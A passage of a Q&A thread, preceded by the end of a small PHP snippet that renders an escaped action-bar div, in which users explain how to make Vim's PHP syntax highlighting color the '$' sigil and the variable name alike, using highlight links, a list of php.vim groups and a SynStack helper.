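        '<div class="action_bar" data-update-id="%s"><span>%s</span></div>',
        htmlspecialchars((string) $row['id'], ENT_QUOTES, 'UTF-8'),
        $label
    );
}

$row = ['id' => 7, 'name' => 'Constructed User', 'status' => 1];   // constructed sample row
echo fillPlaceholders(renderActionBar(), $row), "\n";   // length 2, value 1, label Absent
echo actionBarForRow($row), "\n";                       // label Present
```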

How can I change my Vim vimrc to know when I am typing a PHP variable and match the color?

When using Vim the way my color syntax is now, when I type in $ it shows yellow and when I write text it comes in white. How can I configure my vimrc to know when I am writing a PHP variable ($variable) and keep the color consistent between the $ and the words after it (variable in my example)? It is just a nuisance thing, but I hate seeing variable names with non-matching color, it drives me nuts.
You might want to consider getting this to fix your problem: http://www.vim.org/scripts/script.php?script_id=1571
There is another method for you, if you want to display some custom color for some class, methods, etc.
First of all, download the php.vim.
Then, run the highlight test in Gvim; you will get some keywords like this:
htmlTagN htmlTagN
htmlBoldUnderline htmlBoldUnderline htmlUnderlineBold
htmlBoldItalic htmlBoldItalic htmlItalicBold
htmlBold htmlBold
htmlBoldUnderlineItalic htmlBoldUnderlineItalic htmlBoldItalicUnderline htmlUnderlineBoldItalic htmlUnderlineItalicBold htmlItalicBoldUnderline htmlItalicUnderlineBold
htmlUnderlineItalic htmlUnderlineItalic htmlItalicUnderline
htmlUnderline htmlUnderline
htmlItalic htmlItalic
cssStyle cssStyle
javaScriptCommentSkip javaScriptCommentSkip
javaScriptParens javaScriptParens
javaScriptValue javaScriptValue javaScriptNumber
cssDefinition cssDefinition
cssAttributeSelector cssAttributeSelector
cssMediaBlock cssMediaBlock
cssFontDescriptorBlock cssFontDescriptorBlock
cssPseudoClass cssPseudoClass
cssSpecialCharQQ cssSpecialCharQQ
cssSpecialCharQ cssSpecialCharQ
cssLength cssLength
cssString cssString
phpRegion phpRegion
phpRegionAsp phpRegionAsp
phpRegionSc phpRegionSc
phpIdentifierComplex phpIdentifierComplex
phpMethodsVar phpMethodsVar
phpLabel phpLabel
phpFoldTry phpFoldTry
phpFoldCatch phpFoldCatch
NONE NONE
phpStructureHere phpStructureHere
phpMemberHere phpMemberHere
phpMethodHere phpMethodHere
phpPropertyHere phpPropertyHere
phpTernaryRegion phpTernaryRegion
phpHereDoc phpHereDoc
phpSpecialCharfold phpSpecialCharfold
phpPropertyInString phpPropertyInString
phpIdentifierInString phpIdentifierInString
phpIdentifierInStringComplex phpIdentifierInStringComplex
phpIdentifierInStringErratic phpIdentifierInStringErratic
phpErraticBracketRegion phpErraticBracketRegion
phpStaticUsage phpStaticUsage
phpStaticAccess phpStaticAccess
phpStaticVariable phpStaticVariable
phpStaticCall phpStaticCall
phpForeachRegion phpForeachRegion
phpForRegion phpForRegion
phpConstructRegion phpConstructRegion
phpSwitchConstructRegion phpSwitchConstructRegion
phpDoBlock phpDoBlock
phpSwitchBlock phpSwitchBlock
phpDoWhileConstructRegion phpDoWhileConstructRegion
phpStatementRegion phpStatementRegion
phpCaseRegion phpCaseRegion
phpArrayRegion phpArrayRegion
phpArrayRegionSimple phpArrayRegionSimple
phpArrayComma phpArrayComma phpListComma phpPREGArrayComma
phpListRegion phpListRegion
phpBlockRegion phpBlockRegion
phpParentRegion phpParentRegion
phpBracketRegion phpBracketRegion
phpFoldFunction phpFoldFunction
phpFoldClass phpFoldClass
phpFoldInterface phpFoldInterface
htmlRegion htmlRegion
phpDefineClassName phpDefineClassName
phpDefineClassImplementsName phpDefineClassImplementsName
phpDefineClassImplementsComma phpDefineClassImplementsComma
phpDefineClassImplementsCommentOneLine phpDefineClassImplementsCommentOneLine
phpClassBlock phpClassBlock
phpDefineClassBlockCommentOneline phpDefineClassBlockCommentOneline
phpDefineInterfaceName phpDefineInterfaceName
phpDefineFuncName phpDefineFuncName
phpDefineFuncProto phpDefineFuncProto
phpProtoArray phpProtoArray
phpDefineFuncBlockCommentOneline phpDefineFuncBlockCommentOneline
phpFuncBlock phpFuncBlock
phpDefineMethodName phpDefineMethodName
phpTryBlock phpTryBlock
phpCatchRegion phpCatchRegion
phpCatchBlock phpCatchBlock
phpFoldHtmlInside phpFoldHtmlInside
phpEchoRegion phpEchoRegion
phpClassStart phpClassStart
phpSyncStartOfFile phpSyncStartOfFile
phpSyncComment phpSyncComment
phpSyncString phpSyncString
phpRegionSync phpRegionSync
pregConcat pregConcat
pregClassEscapeMainQuote pregClassEscapeMainQuote
pregClassEscapeDouble2 pregClassEscapeDouble2
pregEscapeMainQuote pregEscapeMainQuote
phpPREGRegion phpPREGRegion
phpPREGOpenParentMulti phpPREGOpenParentMulti
phpPREGRegionMulti phpPREGRegionMulti
phpPREGStringStarter phpPREGStringStarter
phpPREGArrayRegion phpPREGArrayRegion
phpPREGArrayOpenParent phpPREGArrayOpenParent
pregNonSpecialEscape pregNonSpecialEscape
Here it is. You can modify the keywords for your PHP file; add some configuration in your vimrc like this:
hi TabLine guifg=#1C1D1F guibg=#BFBFBF gui=NONE
The 'TabLine' can be replaced by the keywords. guifg is the fore-color, guibg is the background color, gui is the terminal color. You can configure it yourself.
I believe what you're looking for is:
hi link phpIdentifier phpVarSelector
You can simply add this to your ~/.vimrc file or you can create a php-specific "after" syntax file and add it there:
~/.vim/after/syntax/php.vim
Create the directories if they do not already exist.
For future highlighting changes you can use this mapping to figure out what the syntax group is under the cursor.
With this function in your .vimrc you can hit ctrl+p to show the syntactic group of the word/character under the cursor:
function! <SID>SynStack()
  if !exists("*synstack")
    return
  endif
  echo map(synstack(line('.'), col('.')), 'synIDattr(v:val, "name")')
endfunc
nnoremap <C-p> :call <SID>SynStack()<CR>
With this sample PHP code:
$var_name = false;
if the cursor is on the $ I get:
['phpRegion', 'phpIdentifier', 'phpVarSelector']
else, if the cursor is on the n of name, I get:
['phpRegion', 'phpIdentifier']
which means that I need to set both phpIdentifier and phpVarSelector to the same color in my colorscheme to have a consistent look.
